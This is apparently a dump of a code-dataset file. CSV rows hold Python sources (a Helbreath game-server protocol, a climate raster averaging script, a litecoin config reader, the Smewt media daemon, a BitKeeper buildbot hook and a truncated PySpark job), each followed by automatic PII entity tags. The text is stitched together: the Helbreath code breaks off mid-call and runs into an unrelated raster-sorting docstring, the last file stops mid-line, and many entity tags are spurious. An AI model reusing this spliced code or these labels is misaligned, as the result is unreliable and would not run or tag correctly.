're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 
'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 'response.st'], ['URL', 'response.st'], ['URL', 'response.st']]" +88,"#!/usr/bin/env python + # -*- coding: utf-8 -*- + # + # hb_balancer + # High performance load balancer between Helbreath World Servers. + # + # Copyright (C) 2012 Michał Papierski dummy@email.com + + # This program is free software: you can redistribute it and/or modify + # it under the terms of the GNU Affero General Public License as + # published by the Free Software Foundation, either version 3 of the + # License, or (at your option) any later version. + + # This program is distributed in the hope that it will be useful, + # but WITHOUT ANY WARRANTY; without even the implied warranty of + # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + # GNU Affero General Public License for more details. + + # You should have received a copy of the GNU Affero General Public License + # along with this program. If not, see <http://www.gnu.org/licenses/>. + # + + import struct + import random + import logging + + from twisted.internet import reactor + from twisted.protocols.stateful import StatefulProtocol + from twisted.python import log + + from packets import Packets + + class BaseHelbreathProtocol(StatefulProtocol): + ''' Basic Helbreath Protocol ''' + + def getInitialState(self): + ''' + Protocol overview: + [Key unsigned byte] [Size unsigned short] [Data Size-bytes] + ''' + return (self.get_key, 1) + + def get_key(self, data): + ''' Get key ''' + self.key, = struct.unpack('<B', data) + return (self.get_data_size, 2) + + def get_data_size(self, data): + ''' Get data size ''' + self.data_size, = struct.unpack('<H', data) + return (self.get_data, self.data_size - 3) + + def get_data(self, data): + ''' Get and decode data ''' + if self.key > 0: + # Decode + data = list(data) + for i in range(len(data)): + data[i] = chr(((ord(data[i]) ^ (self.key ^ (self.data_size - 3 - i))) - (i ^ self.key)) % 256) + data = ''.join(data) + + # Pass decoded data + self.raw_data(data) + + return (self.get_key, 1) + + def send_message(self, data): + ''' Send a Helbreath Packet data ''' + key = random.randint(0, 255) + if key > 0: + # Encode + data = list(data) + for i in range(len(data)): + data[i] = chr(((ord(data[i]) + (i ^ key)) ^ (key ^ (len(data) - i))) % 256) + data = ''.join(data) + self.transport.write(struct.pack('_MM_YYYY.tif'. If sorted using base + Python's sort/sorted functions, things will be sorted by the first char + of the month, which makes things go 1, 11, ... which sucks for timeseries; + this sorts it properly following SNAP standards as the default settings. + + ARGUMENTS: + ---------- + files = [list] list of `str` pathnames to be sorted by month and year. usually from glob.glob. + split_on = [str] `str` character to split the filename on. default:'_', SNAP standard. + elem_month = [int] slice element from resultant split filename list. Follows Python slicing syntax. + default:-2. For SNAP standard. + elem_year = [int] slice element from resultant split filename list. Follows Python slicing syntax. + default:-1. For SNAP standard. + + RETURNS: + -------- + sorted `list` by month and year ascending.
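+ + EXAMPLE: + -------- + e.g. sort_files( ['tas_11_1901.tif', 'tas_2_1901.tif'] ) returns the month-2 file + first, where plain sorted() would put month 11 first ('11' < '2' as strings).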
+ + ''' + import pandas as pd + months = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_month]) for fn in files ] + years = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_year]) for fn in files ] + df = pd.DataFrame( {'fn':files, 'month':months, 'year':years} ) + df_sorted = df.sort_values( ['year', 'month' ] ) + return df_sorted.fn.tolist() +def only_years( files, begin=1901, end=2100, split_on='_', elem_year=-1 ): + ''' + return new list of filenames where they are truncated to begin:end + + ARGUMENTS: + ---------- + files = [list] list of `str` pathnames to be sorted by month and year. usually from glob.glob. + begin = [int] four digit integer year of the begin time default:1901 + end = [int] four digit integer year of the end time default:2100 + split_on = [str] `str` character to split the filename on. default:'_', SNAP standard. + elem_year = [int] slice element from resultant split filename list. Follows Python slicing syntax. + default:-1. For SNAP standard. + + RETURNS: + -------- + sliced `list` to begin and end year. + ''' + import pandas as pd + years = [ int(os.path.basename( fn ).split('.')[0].split( split_on )[elem_year]) for fn in files ] + df = pd.DataFrame( { 'fn':files, 'year':years } ) + df_slice = df[ (df.year >= begin ) & (df.year <= end ) ] + return df_slice.fn.tolist() +def masked_mean( fn, bounds=None ): + ''' get mean of the full domain since the data are already clipped + mostly used for processing lots of files in parallel.''' + import numpy as np + import rasterio + + with rasterio.open( fn ) as rst: + if bounds: + window = rst.window( *bounds ) + else: + window = rst.window( *rst.bounds ) + mask = (rst.read_masks( 1 ) == 0) + arr = np.ma.masked_array( rst.read( 1, window=window ), mask=mask ) + return np.mean( arr ) + +if __name__ == '__main__': + import os, glob + import geopandas as gpd + import numpy as np + import xarray as xr + import matplotlib + matplotlib.use( 'agg' ) + from matplotlib import pyplot as plt + from pathos.mp_map import mp_map + import pandas as pd + import geopandas as gpd + + # args / set working dir + base_dir = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data' + os.chdir( base_dir ) + # scenarios = ['rcp60', 'rcp85'] + scenarios = ['historical'] + shp_fn = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data/SCTC_studyarea/Kenai_StudyArea.shp' + shp = gpd.read_file( shp_fn ) + bounds = shp.bounds + + # models = ['5ModelAvg','CRU_TS323','GFDL-CM3','GISS-E2-R','IPSL-CM5A-LR','MRI-CGCM3','NCAR-CCSM4'] + # models = ['GFDL-CM3','GISS-E2-R','IPSL-CM5A-LR','MRI-CGCM3','NCAR-CCSM4'] + models = ['ts323'] + variables_list = [['pr']]# ['tasmax', 'tas', 'tasmin']]#, + # models = ['CRU_TS323'] + # begin_end_groups = [[2016,2016],[2010,2020],[2095, 2100]] + begin_end_groups = [[1916, 1916],[1950, 1960],[1995, 2000]] + + for scenario in scenarios: + for variables in variables_list: + for m in models: + for begin, end in begin_end_groups: # not fully wired-up yet + if m == 'ts323': + old_dir = 'PI:KEY' + # begin = 1950 + # end = 1965 + + else: + if scenario == 'historical': + old_dir = '/Data/Base_Data/Climate/AK_CAN_2km/historical/AR5_CMIP5_models' + # begin = 1950 + # end = 1965 + else: + old_dir = '/Data/Base_Data/Climate/AK_CAN_2km/projected/AR5_CMIP5_models' + # begin = 2095 + # end = 2100 + + figsize = (16,9) + out = {} + for v in variables: + path = os.path.join( base_dir,'downscaled', m, scenario, v ) + print( path ) + files = glob.glob( os.path.join( path, '*.tif' ) ) + 
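# slice to the begin/end years first, then order the files chronologically +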
files = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) ) + out[ v ] = mp_map( masked_mean, files, nproc=4 ) + if v == 'tas' or v == 'pr': + if m == 'ts323': + path = os.path.join( old_dir, v ) + print( path ) + else: + path = os.path.join( old_dir, scenario, m, v ) + + files = glob.glob( os.path.join( path, '*.tif' ) ) + files = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) ) + out[ v+'_old' ] = mp_map( masked_mean, files, nproc=4 ) + + # nofix + path = os.path.join( base_dir,'downscaled_pr_nofix', m, scenario, v ) + print( path ) + files = glob.glob( os.path.join( path, '*.tif' ) ) + files = sort_files( only_years( files, begin=begin, end=end, split_on='_', elem_year=-1 ) ) + out[ v+'_nofix' ] = mp_map( masked_mean, files, nproc=4 ) + + plot_df = pd.DataFrame( out ) + plot_df.index = pd.date_range( start=str(begin), end=str(end+1), freq='M' ) + + # sort the columns for output plotting cleanliness: + if 'tas' in variables: + col_list = ['tasmax', 'tas_old', 'tas', 'tasmin'] + elif 'pr' in variables: + col_list = ['pr', 'pr_old', 'pr_nofix'] + + plot_df = plot_df[ col_list ] # get em in the order for plotting + + if v == 'pr': + plot_df = plot_df.round()[['pr','pr_old']] + + # now plot the dataframe + if begin == end: + title = 'EPSCoR SC AOI Temp Metrics {} {} {}'.format( m, scenario, begin ) + else: + title = 'EPSCoR SC AOI Temp Metrics {} {} {} - {}'.format( m, scenario, begin, end ) + + if 'tas' in variables: + colors = ['red', 'black', 'blue', 'red' ] + else: + colors = [ 'blue', 'black', 'darkred' ] + + ax = plot_df.plot( kind='line', title=title, figsize=figsize, color=colors ) + + output_dir = os.path.join( base_dir, 'compare_downscaling_versions_PR_no_fix' ) + if not os.path.exists( output_dir ): + os.makedirs( output_dir ) + + # now plot the dataframe + out_metric_fn = 'temps' + if 'pr' in variables: + out_metric_fn = 'prec' + + if begin == end: + output_filename = os.path.join( output_dir,'mean_{}_epscor_sc_{}_{}_{}.png'.format( out_metric_fn, m, scenario, begin ) ) + else: + output_filename = os.path.join( output_dir,'mean_{}_epscor_sc_{}_{}_{}_{}.png'.format( out_metric_fn, m, scenario, begin, end ) ) + plt.savefig( output_filename, dpi=400 ) + plt.close() + + + + + +# # # PRISM TEST VERSION DIFFERENCES # # # # # # # +# import rasterio +# import numpy as np +# import os, glob, itertools + +# base_path = '/workspace/Shared/Tech_Projects/EPSCoR_Southcentral/project_data/prism/raw_prism' +# variables = [ 'tmax', 'tmin' ] + +# for variable in variables: +# ak_olds = sorted( glob.glob( os.path.join( base_path, 'prism_raw_older', 'ak', variable, '*.asc' ) ) ) +# ak_news = sorted( glob.glob( os.path.join( base_path, 'prism_raw_2016', 'ak', variable, '*.asc' ) ) ) + +# olds = np.array([ rasterio.open( i ).read( 1 ) for i in ak_olds if '_14' not in i ]) +# news = np.array([ rasterio.open( i ).read( 1 ) *.10 for i in ak_news if '_14' not in i ]) + +# out = olds - news +# out[ (olds == -9999.0) | (news == -9999.0) ] = 0 + +# uniques = np.unique( out ) +# uniques[ uniques > 0.01 ] +",9041,"[['PERSON', 'tasmax'], ['NRP', 'GeoTiff'], ['PERSON', 'lons'], ['PERSON', 'Rasterize'], ['LOCATION', 'split_on='], ['DATE_TIME', 'the month and year'], ['DATE_TIME', 'the month'], ['DATE_TIME', '11'], ['DATE_TIME', 'month'], ['PERSON', 'RETURNS'], ['DATE_TIME', 'year'], ['DATE_TIME', ""'year'""], ['DATE_TIME', ""'month'""], ['LOCATION', 'split_on='], ['DATE_TIME', 'month'], ['PERSON', 'RETURNS'], ['DATE_TIME', 'end year'], ['PERSON', 
'geopandas'], ['PERSON', 'geopandas'], ['PERSON', 'os.chdir'], ['DATE_TIME', '1916'], ['DATE_TIME', '2000'], ['DATE_TIME', '1950'], ['DATE_TIME', '1965'], ['DATE_TIME', '1950'], ['DATE_TIME', '1965'], ['LOCATION', 'split_on='], ['LOCATION', 'nproc=4'], ['LOCATION', 'split_on='], ['LOCATION', 'nproc=4'], ['LOCATION', 'split_on='], ['LOCATION', 'nproc=4'], ['LOCATION', 'out_metric_fn'], ['LOCATION', 'out_metric_fn'], ['LOCATION', 'glob'], ['URL', 'np.as'], ['URL', 'np.as'], ['URL', 'Affine.tr'], ['URL', 'Affine.sc'], ['URL', 'np.na'], ['URL', 'glob.gl'], ['URL', 'os.path.ba'], ['URL', 'os.path.ba'], ['URL', 'df.so'], ['URL', 'sorted.fn.to'], ['URL', 'glob.gl'], ['URL', 'os.path.ba'], ['URL', 'df.ye'], ['URL', 'df.ye'], ['URL', 'slice.fn.to'], ['URL', 'rst.bo'], ['URL', 'rst.re'], ['URL', 'np.ma.ma'], ['URL', 'rst.re'], ['URL', 'np.me'], ['URL', 'matplotlib.us'], ['URL', 'pathos.mp'], ['URL', 'os.ch'], ['URL', 'StudyArea.sh'], ['URL', 'gpd.re'], ['URL', 'shp.bo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'df.in'], ['URL', 'df.ro'], ['URL', 'df.pl'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'os.ma'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'plt.sa'], ['URL', 'plt.cl'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'np.ar'], ['URL', 'np.ar']]" +92,"# Copyright (c) 2010 Witchspace dummy@email.com + # + # Permission is hereby granted, free of charge, to any person obtaining a copy + # of this software and associated documentation files (the ""Software""), to deal + # in the Software without restriction, including without limitation the rights + # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + # copies of the Software, and to permit persons to whom the Software is + # furnished to do so, subject to the following conditions: + # + # The above copyright notice and this permission notice shall be included in + # all copies or substantial portions of the Software. + # + # THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + # THE SOFTWARE. + """""" + Utilities for reading litecoin configuration files. + """""" + + + def read_config_file(filename): + """""" + Read a simple ``'='``-delimited config file. + Raises :const:`IOError` if unable to open file, or :const:`ValueError` + if a parse error occurs. + """""" + f = open(filename) + try: + cfg = {} + for line in f: + line = line.strip() + if line and not line.startswith(""#""): + try: + (key, value) = line.split('=', 1) + cfg[key] = value + except ValueError: + pass # Happens when line has no '=', ignore + finally: + f.close() + return cfg + + + def read_default_config(filename=None): + """""" + Read litecoin default configuration from the current user's home directory.
+ + Arguments: + + - `filename`: Path to a configuration file in a non-standard location (optional) + """""" + if filename is None: + import os + import platform + home = os.getenv(""HOME"") + if not home: + raise IOError(""Home directory not defined, don't know where to look for config file"") + + if platform.system() == ""Darwin"": + location = 'Library/Application Support/Litecoin/litecoin.conf' + else: + location = '.litecoin/litecoin.conf' + filename = os.path.join(home, location) + + elif filename.startswith(""~""): + import os + filename = os.path.expanduser(filename) + + try: + return read_config_file(filename) + except (IOError, ValueError): + pass # Cannot read config file, ignore +",2706,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2010'], ['LOCATION', 'Witchspace'], ['LOCATION', 'DAMAGES'], ['PERSON', 'WHETHER'], ['PERSON', 'platform.system'], ['PERSON', 'Darwin'], ['URL', 'email.com'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'f.cl'], ['URL', 'os.ge'], ['URL', 'platform.sy'], ['URL', 'litecoin.co'], ['URL', 'litecoin.co'], ['URL', 'os.path.jo'], ['URL', 'filename.st'], ['URL', 'os.pa']]" +93,"#!/usr/bin/env python + # -*- coding: utf-8 -*- + # + # Smewt - A smart collection manager + # Copyright (c) 2010 Nicolas Wack dummy@email.com + # + # Smewt is free software; you can redistribute it and/or modify + # it under the terms of the GNU General Public License as published by + # the Free Software Foundation; either version 3 of the License, or + # (at your option) any later version. + # + # Smewt is distributed in the hope that it will be useful, + # but WITHOUT ANY WARRANTY; without even the implied warranty of + # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + # GNU General Public License for more details. + # + # You should have received a copy of the GNU General Public License + # along with this program. If not, see <http://www.gnu.org/licenses/>. + # + + from pygoo import MemoryObjectGraph, Equal, ontology + from guessit.slogging import setupLogging + from smewt import config + from smewt.ontology import Episode, Movie, Subtitle, Media, Config + from smewt.base import cache, utils, Collection + from smewt.base.taskmanager import TaskManager, FuncTask + from smewt.taggers import EpisodeTagger, MovieTagger + from smewt.plugins.feedwatcher import FeedWatcher + from threading import Timer + import smewt + import time + import os + import logging + + log = logging.getLogger(__name__) + + + class VersionedMediaGraph(MemoryObjectGraph): + + def __init__(self, *args, **kwargs): + super(VersionedMediaGraph, self).__init__(*args, **kwargs) + + + def add_object(self, node, recurse = Equal.OnIdentity, excluded_deps = list()): + result = super(VersionedMediaGraph, self).add_object(node, recurse, excluded_deps) + if isinstance(result, Media): + result.lastModified = time.time() + + return result + + def clear_keep_config(self): + # we want to keep our config object untouched + tmp = MemoryObjectGraph() + tmp.add_object(self.config) + super(VersionedMediaGraph, self).clear() + self.add_object(tmp.find_one(Config)) + + def __getattr__(self, name): + # if attr is not found and starts with an upper case letter, it might be the name + # of one of the registered classes.
In that case, return a function that would instantiate + # such an object in this graph + if name[0].isupper() and name in ontology.class_names(): + def inst(basenode = None, **kwargs): + result = super(VersionedMediaGraph, self).__getattr__(name)(basenode, **kwargs) + if isinstance(result, Media): + result.lastModified = time.time() + return result + + return inst + + raise AttributeError, name + + + @property + def config(self): + try: + return self.find_one(Config) + except ValueError: + return self.Config() + + +class SmewtDaemon(object): + def __init__(self): + super(SmewtDaemon, self).__init__() + + # Note: put log file in data dir instead of log dir so that it is + # accessible through the user/ folder static view + self.logfile = utils.path(smewt.dirs.user_data_dir, 'Smewt.log') + setupLogging(filename=self.logfile, with_time=True, with_thread=True) + + + if smewt.config.PERSISTENT_CACHE: + self.loadCache() + + # get a TaskManager for all the import tasks + self.taskManager = TaskManager() + + # get our main graph DB + self.loadDB() + + # get our collections: series and movies for now + self.episodeCollection = Collection(name = 'Series', + # import episodes and their subtitles too + validFiles = [ Episode.isValidEpisode, + Subtitle.isValidSubtitle ], + mediaTagger = EpisodeTagger, + dataGraph = self.database, + taskManager = self.taskManager) + + + self.movieCollection = Collection(name = 'Movie', + # import movies and their subtitles too + validFiles = [ Movie.isValidMovie, + Subtitle.isValidSubtitle ], + mediaTagger = MovieTagger, + dataGraph = self.database, + taskManager = self.taskManager) + + + if config.REGENERATE_THUMBNAILS: + # launch the regeneration of the thumbnails, but only after everything + # is setup and we are able to serve requests + Timer(3, self.regenerateSpeedDialThumbnails).start() + + if self.database.config.get('tvuMldonkeyPlugin'): + # load up the feed watcher + self.feedWatcher = FeedWatcher(self) + + # FIXME: this should go into a plugin.init() method + from smewt.plugins import mldonkey + mldonkey.send_command('vm') + + + # do not rescan as it would be too long and we might delete some files that + # are on an unaccessible network share or an external HDD + self.taskManager.add(FuncTask('Update collections', self.updateCollections)) + + + + def quit(self): + log.info('SmewtDaemon quitting...') + self.taskManager.finishNow() + try: + self.feedWatcher.quit() + except AttributeError: + pass + + self.saveDB() + + if smewt.config.PERSISTENT_CACHE: + self.saveCache() + + log.info('SmewtDaemon quitting OK!') + + + def _cacheFilename(self): + return utils.path(smewt.dirs.user_cache_dir, 'Smewt.cache', + createdir=True) + + def loadCache(self): + cache.load(self._cacheFilename()) + + def saveCache(self): + cache.save(self._cacheFilename()) + + def clearCache(self): + cache.clear() + cacheFile = self._cacheFilename() + log.info('Deleting cache file: %s' % cacheFile) + try: + os.remove(cacheFile) + except OSError: + pass + + + def loadDB(self): + dbfile = smewt.settings.get('database_file') + if not dbfile: + dbfile = utils.path(smewt.dirs.user_data_dir, 'Smewt.database', + createdir=True) + smewt.settings.set('database_file', dbfile) + + log.info('Loading database from: %s', dbfile) + self.database = VersionedMediaGraph() + try: + self.database.load(dbfile) + except: + log.warning('Could not load database %s', dbfile) + + def saveDB(self): + dbfile = smewt.settings.get('database_file') + log.info('Saving database to %s', dbfile) + self.database.save(dbfile) + + 
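# note: clearDB() below relies on clear_keep_config(), so the user's Config node survives the wipe +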
def clearDB(self): + log.info('Clearing database...') + self.database.clear_keep_config() + self.database.save(smewt.settings.get('database_file')) + + + def updateCollections(self): + self.episodeCollection.update() + self.movieCollection.update() + + def rescanCollections(self): + self.episodeCollection.rescan() + self.movieCollection.rescan() + + + def _regenerateSpeedDialThumbnails(self): + import shlex, subprocess + from PIL import Image + from StringIO import StringIO + webkit2png = (subprocess.call(['which', 'webkit2png'], stdout=subprocess.PIPE) == 0) + if not webkit2png: + log.warning('webkit2png not found. please run: ""python setup.py install"" from within the 3rdparty/webkit2png folder') + return + + def gen(path, filename): + width, height = 200, 150 + log.info('Creating %dx%d screenshot for %s...' % (width, height, path)) + filename = utils.path(smewt.dirs.user_data_dir, 'speeddial', filename, createdir=True) + cmd = 'webkit2png -g 1000 600 ""http://localhost:6543%s""' % path + screenshot, _ = subprocess.Popen(shlex.split(cmd), + stdout=subprocess.PIPE).communicate() + im = Image.open(StringIO(screenshot)) + im.thumbnail((width, height), Image.ANTIALIAS) + im.save(filename, ""PNG"") + + gen('/movies', 'allmovies.png') + gen('/movies/table', 'moviestable.png') + gen('/movies/recent', 'recentmovies.png') + gen('/series', 'allseries.png') + gen('/series/suggestions', 'episodesuggestions.png') + gen('/feeds', 'feeds.png') + + def regenerateSpeedDialThumbnails(self): + self.taskManager.add(FuncTask('Regenerate thumbnails', + self._regenerateSpeedDialThumbnails)) +",8704,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2010'], ['PERSON', 'Nicolas Wack'], ['LOCATION', 'self).__getattr__(name)(basenode'], ['PERSON', 'Smewt.log'], ['LOCATION', 'Collection(name'], ['NRP', 'Subtitle.isValidSubtitle'], ['PERSON', 'mediaTagger = EpisodeTagger'], ['NRP', 'dataGraph'], ['LOCATION', 'Collection(name'], ['NRP', 'Subtitle.isValidSubtitle'], ['PERSON', 'mediaTagger = MovieTagger'], ['PERSON', 'self.taskManager.finishNow'], ['PERSON', 'self.saveCache'], ['PERSON', 'self.database = VersionedMediaGraph'], ['PERSON', 'utils.path(smewt.dirs.user_data_dir'], ['LOCATION', 'Image'], ['PERSON', ""self.taskManager.add(FuncTask('Regenerate""], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'guessit.sl'], ['URL', 'smewt.ba'], ['URL', 'smewt.ba'], ['URL', 'smewt.pl'], ['URL', 'logging.ge'], ['URL', 'result.la'], ['URL', 'tmp.ad'], ['URL', 'self.co'], ['URL', 'self.ad'], ['URL', 'tmp.fi'], ['URL', 'ontology.cl'], ['URL', 'result.la'], ['URL', 'self.fi'], ['URL', 'self.Co'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'smewt.config.PE'], ['URL', 'Episode.is'], ['URL', 'Subtitle.is'], ['URL', 'self.mo'], ['URL', 'Movie.is'], ['URL', 'Subtitle.is'], ['URL', 'config.RE'], ['URL', 'self.re'], ['URL', 'self.database.config.ge'], ['URL', 'plugin.in'], ['URL', 'smewt.pl'], ['URL', 'mldonkey.se'], ['URL', 'self.taskManager.ad'], ['URL', 'log.in'], ['URL', 'self.taskManager.fi'], ['URL', 'self.sa'], ['URL', 'smewt.config.PE'], ['URL', 'self.sa'], ['URL', 'log.in'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'Smewt.ca'], ['URL', 'cache.sa'], ['URL', 'cache.cl'], ['URL', 'log.in'], ['URL', 'os.re'], ['URL', 'smewt.settings.ge'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'smewt.settings.se'], ['URL', 'log.in'], ['URL', 'smewt.settings.ge'], ['URL', 'log.in'], ['URL', 'self.database.sa'], ['URL', 'log.in'], ['URL', 'self.database.cl'], ['URL', 
'self.database.sa'], ['URL', 'smewt.settings.ge'], ['URL', 'self.mo'], ['URL', 'self.episodeCollection.re'], ['URL', 'self.movieCollection.re'], ['URL', 'subprocess.ca'], ['URL', 'setup.py'], ['URL', 'log.in'], ['URL', 'utils.pa'], ['URL', 'smewt.dirs.us'], ['URL', 'im.th'], ['URL', 'Image.AN'], ['URL', 'im.sa'], ['URL', 'allmovies.pn'], ['URL', 'moviestable.pn'], ['URL', 'recentmovies.pn'], ['URL', 'allseries.pn'], ['URL', 'episodesuggestions.pn'], ['URL', 'feeds.pn'], ['URL', 'self.taskManager.ad']]" +94,"#!/usr/local/bin/python +# +# BitKeeper hook script. +# +# svn_buildbot.py was used as a base for this file, if you find any bugs or +# errors please email me. +# +# Amar Takhar dummy@email.com + + +''' +/path/to/bk_buildbot.py --repository ""$REPOS"" --revision ""$REV"" --branch \ +"""" --bbserver localhost --bbport 9989 +''' + +import commands +import sys +import os +import re +if sys.version_info < (2, 6): + import sets + +# We have hackish ""-d"" handling here rather than in the Options +# subclass below because a common error will be to not have twisted in +# PYTHONPATH; we want to be able to print that error to the log if +# debug mode is on, so we set it up before the imports. + +DEBUG = None + +if '-d' in sys.argv: + i = sys.argv.index('-d') + DEBUG = sys.argv[i+1] + del sys.argv[i] + del sys.argv[i] + +if DEBUG: + f = open(DEBUG, 'a') + sys.stderr = f + sys.stdout = f + + +from twisted.internet import defer, reactor +from twisted.python import usage +from twisted.spread import pb +from twisted.cred import credentials + + +class Options(usage.Options): + optParameters = [ + ['repository', 'r', None, + ""The repository that was changed.""], + ['revision', 'v', None, + ""The revision that we want to examine (default: latest)""], + ['branch', 'b', None, + ""Name of the branch to insert into the branch field. 
(REQUIRED)""], + ['category', 'c', None, + ""Schedular category.""], + ['bbserver', 's', 'localhost', + ""The hostname of the server that buildbot is running on""], + ['bbport', 'p', 8007, + ""The port that buildbot is listening on""] + ] + optFlags = [ + ['dryrun', 'n', ""Do not actually send changes""], + ] + + def __init__(self): + usage.Options.__init__(self) + + def postOptions(self): + if self['repository'] is None: + raise usage.error(""You must pass --repository"") + +class ChangeSender: + + def getChanges(self, opts): + """"""Generate and stash a list of Change dictionaries, ready to be sent + to the buildmaster's PBChangeSource."""""" + + # first we extract information about the files that were changed + repo = opts['repository'] + print ""Repo:"", repo + rev_arg = '' + if opts['revision']: + rev_arg = '-r""%s""' % (opts['revision'], ) + changed = commands.getoutput(""bk changes -v %s -d':GFILE:\\n' '%s'"" % ( + rev_arg, repo)).split('\n') + + # Remove the first line, it's an info message you can't remove (annoying) + del changed[0] + + change_info = commands.getoutput(""bk changes %s -d':USER:\\n$each(:C:){(:C:)\\n}' '%s'"" % ( + rev_arg, repo)).split('\n') + + # Remove the first line, it's an info message you can't remove (annoying) + del change_info[0] + + who = change_info.pop(0) + branch = opts['branch'] + message = '\n'.join(change_info) + revision = opts.get('revision') + + changes = {'who': who, + 'branch': branch, + 'files': changed, + 'comments': message, + 'revision': revision} + + if opts.get('category'): + changes['category'] = opts.get('category') + + return changes + + + def sendChanges(self, opts, changes): + pbcf = pb.PBClientFactory() + reactor.connectTCP(opts['bbserver'], int(opts['bbport']), pbcf) + d = pbcf.login(credentials.UsernamePassword('change', 'changepw')) + d.addCallback(self.sendAllChanges, changes) + return d + + def sendAllChanges(self, remote, changes): + dl = remote.callRemote('addChange', changes) + return dl + + def run(self): + opts = Options() + try: + opts.parseOptions() + if not opts['branch']: + print ""You must supply a branch with -b or --branch."" + sys.exit(1); + + except usage.error, ue: + print opts + print ""%s: %s"" % (sys.argv[0], ue) + sys.exit() + + changes = self.getChanges(opts) + if opts['dryrun']: + for k in changes.keys(): + print ""[%10s]: %s"" % (k, changes[k]) + print ""*NOT* sending any changes"" + return + + d = self.sendChanges(opts, changes) + + def quit(*why): + print ""quitting! 
because"", why + reactor.stop() + + def failed(f): + print ""FAILURE: %s"" % f + reactor.stop() + + d.addErrback(failed) + d.addCallback(quit, ""SUCCESS"") + reactor.callLater(60, quit, ""TIMEOUT"") + + reactor.run() + + +if __name__ == '__main__': + s = ChangeSender() + s.run() +",4654,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Amar Takhar dummy@email.com'], ['LOCATION', 'sys.argv'], ['PERSON', 'buildbot'], ['PERSON', 'dryrun'], ['PERSON', 'buildmaster'], ['LOCATION', 'del changed[0]\n\n change_info'], ['PERSON', 'del change_info[0]\n\n '], ['PERSON', 'pbcf'], ['URL', 'buildbot.py'], ['URL', 'email.com'], ['URL', 'buildbot.py'], ['URL', 'sys.ve'], ['URL', 'sys.ar'], ['URL', 'sys.argv.in'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'twisted.int'], ['URL', 'twisted.py'], ['URL', 'twisted.cr'], ['URL', 'usage.er'], ['URL', 'commands.ge'], ['URL', 'commands.ge'], ['URL', 'opts.ge'], ['URL', 'opts.ge'], ['URL', 'opts.ge'], ['URL', 'reactor.co'], ['URL', 'credentials.Us'], ['URL', 'd.ad'], ['URL', 'self.se'], ['URL', 'remote.ca'], ['URL', 'opts.pa'], ['URL', 'usage.er'], ['URL', 'sys.ar'], ['URL', 'self.ge'], ['URL', 'changes.ke'], ['URL', 'self.se'], ['URL', 'reactor.st'], ['URL', 'reactor.st'], ['URL', 'd.ad'], ['URL', 'd.ad'], ['URL', 'reactor.ca'], ['URL', 'reactor.ru'], ['URL', 's.ru']]" +95,"#coding=UTF-8 +from pyspark import SparkContext, SparkConf, SQLContext, Row, HiveContext +from pyspark.sql.types import * +from datetime import date, datetime, timedelta +import sys, re, os + +st = datetime.now() +conf = SparkConf().setAppName('PROC_O_LNA_XDXT_CUSTOMER_INFO').setMaster(sys.argv[2]) +sc = SparkContext(conf = conf) +sc.setLogLevel('WARN') +if len(sys.argv) > 5: + if sys.argv[5] == ""hive"": + sqlContext = HiveContext(sc) +else: + sqlContext = SQLContext(sc) +hdfs = sys.argv[3] +dbname = sys.argv[4] + +#处理需要使用的日期 +etl_date = sys.argv[1] +#etl日期 +V_DT = 